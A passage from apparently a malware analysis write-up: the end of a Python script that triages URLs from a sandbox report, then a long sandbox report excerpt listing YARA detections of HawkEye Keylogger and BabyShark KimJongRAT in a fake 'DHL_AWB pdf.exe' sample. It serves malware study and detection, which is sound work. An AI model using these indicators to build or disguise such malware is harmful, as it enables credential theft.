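            out.append(("memory", source_pid(tok), tok))
        elif nxt is not None and nxt.endswith(".sdmp"):
            # image name followed by its dump: fold both into one memory source
            out.append(("memory", source_pid(nxt), f"{tok} {nxt}"))
            i += 1
        else:
            out.append(("binary", None, tok))
        i += 1
    return out


def parse_findings(text):
    """Yield (kind, pid, token, url) for every finding line that matches."""
    for line in text.splitlines():
        m = FINDING_RE.match(line)
        if not m:
            continue
        for kind, pid, tok in classify_sources(m.group("src")):
            yield kind, pid, tok, m.group("url")


def triage(text):
    """Group URLs by where they were seen and single out those that only
    appear in the malware image or its memory, never in a dropped file.
    Those are the candidates for hard-coded targets (credential endpoints,
    C2, update URLs); URLs also present in a dropped file are more likely
    harvested victim data the process read and wrote out."""
    by_kind = defaultdict(set)
    pids = set()
    for kind, pid, _tok, url in parse_findings(text):
        by_kind[kind].add(url)
        if pid is not None:
            pids.add(pid)
    embedded = (by_kind["binary"] | by_kind["memory"]) - by_kind["dropped_file"]
    return {
        "pids": sorted(pids),
        "dropped_file": sorted(by_kind["dropped_file"]),
        "memory": sorted(by_kind["memory"]),
        "binary": sorted(by_kind["binary"]),
        "embedded_only": sorted(embedded),
        "embedded_hosts": sorted({urlsplit(u).netloc for u in embedded}),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_FINDINGS).items():
        print(f"{key}: {value}")
```

Run against the full report text the same way; the embedded_only bucket is the short list to pivot on, while the dropped_file bucket tells you which of the victim's browsing artefacts the process touched.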

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Yara detected HawkEye Keylogger
            Source: Yara match | File source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5024860.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.4f54640.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000000.00000002.290657795.000000000536D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.517940589.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.289479199.0000000004E84000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2172, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2960, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 11_2_0040F078 OpenClipboard,GetLastError,DeleteFileW | 11_2_0040F078

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7de834a.4.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT | Author: Florian Roth
            Source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4abdbda.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT | Author: Florian Roth
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.4291990.2.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT | Author: Florian Roth
            Source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4abdbda.2.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT | Author: Florian Roth
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye Keylogger Reborn | Author: Florian Roth
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: HawkEye v9 Payload | Author: ditekshen
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye Keylogger Reborn | Author: Florian Roth
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.unpack, type: UNPACKEDPE | Matched rule: HawkEye v9 Payload | Author: ditekshen
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye Keylogger Reborn | Author: Florian Roth
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.raw.unpack, type: UNPACKEDPE | Matched rule: HawkEye v9 Payload | Author: ditekshen
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7de834a.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT | Author: Florian Roth
            Source: 24.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT | Author: Florian Roth
            Source: 24.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT | Author: Florian Roth
            Source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65890.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT | Author: Florian Roth
            Source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65890.0.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT | Author: Florian Roth
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.4291990.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT | Author: Florian Roth
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.41f5950.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT | Author: Florian Roth
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90000.6.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT | Author: Florian Roth
            Source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65bd5.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT | Author: Florian Roth
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT | Author: Florian Roth
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90345.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT | Author: Florian Roth
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5024860.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye Keylogger Reborn | Author: Florian Roth
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5024860.4.raw.unpack, type: UNPACKEDPE | Matched rule: HawkEye v9 Payload | Author: ditekshen
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.4f54640.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects HawkEye Keylogger Reborn | Author: Florian Roth
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.4f54640.2.raw.unpack, type: UNPACKEDPE | Matched rule: HawkEye v9 Payload | Author: ditekshen
            Source: 00000000.00000002.290657795.000000000536D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye Keylogger Reborn | Author: Florian Roth
            Source: 00000007.00000002.528296707.0000000007D90000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT | Author: Florian Roth
            Source: 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye Keylogger Reborn | Author: Florian Roth
            Source: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects BabyShark KimJongRAT | Author: Florian Roth
            Source: 00000007.00000002.517940589.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye Keylogger Reborn | Author: Florian Roth
            Source: 00000000.00000002.289479199.0000000004E84000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects HawkEye Keylogger Reborn | Author: Florian Roth
            Source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2172, type: MEMORYSTR | Matched rule: Detects HawkEye Keylogger Reborn | Author: Florian Roth
            Source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2960, type: MEMORYSTR | Matched rule: Detects HawkEye Keylogger Reborn | Author: Florian Roth
            Initial sample is a PE file and has a suspicious name
            Source: initial sample | Static PE information: Filename: DHL_AWB 518877882999_887755468_pdf.exe
            Uses 32bit PE files
            Source: DHL_AWB 518877882999_887755468_pdf.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Yara signature match
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7de834a.4.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4abdbda.2.raw.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.4291990.2.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4abdbda.2.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.unpack, type: UNPACKEDPE | Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.unpack, type: UNPACKEDPE | Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.unpack, type: UNPACKEDPE | Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.raw.unpack, type: UNPACKEDPE | Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5293710.3.raw.unpack, type: UNPACKEDPE | Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7de834a.4.raw.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 24.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 24.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65890.0.raw.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65890.0.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.4291990.2.raw.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.41f5950.3.raw.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90000.6.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.3.DHL_AWB 518877882999_887755468_pdf.exe.4a65bd5.1.raw.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90000.6.raw.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.7d90345.5.raw.unpack, type: UNPACKEDPE | Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5024860.4.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5024860.4.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.5024860.4.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.4f54640.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.4f54640.2.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 0.2.DHL_AWB 518877882999_887755468_pdf.exe.4f54640.2.raw.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 00000000.00000002.290657795.000000000536D000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000007.00000002.528296707.0000000007D90000.00000004.00020000.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 00000007.00000002.523956583.0000000003203000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 00000007.00000002.517940589.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 00000000.00000002.289479199.0000000004E84000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2172, type: MEMORYSTRMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: Process Memory Space: DHL_AWB 518877882999_887755468_pdf.exe PID: 2960, type: MEMORYSTRMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 0_2_019A1070
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 0_2_019A23E1
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 0_2_019A3230
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 0_2_019A0470
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 0_2_019A4138
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 0_2_019A4129
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 0_2_019A3159
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 0_2_019A5008
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 0_2_019A5830
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 0_2_019A5840
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 0_2_019A1373
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 0_2_019A5A28
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 0_2_019A55D3
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 0_2_019A55E0
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 0_2_019A842F
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 0_2_019A5458
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 0_2_019A5448
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 0_2_019A8440
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 0_2_019A0FB9
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 0_2_058C75C8
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 0_2_058C75D8
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 0_2_058C4B4C
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01692068
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_016904D8
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_016954B8
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01699920
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01697868
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_016938E6
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01690C48
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01696C20
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01699F80
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01694168
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01694178
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01693568
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01693563
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01690562
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01694528
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_0169053B
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01694519
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_016905ED
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_016905A6
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01699910
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_016929E9
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_016929F8
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_016939D7
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01693981
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01695878
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01697858
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_016948E0
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_016948D0
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01695888
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01693B60
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe; Code function: 7_2_01693B1E
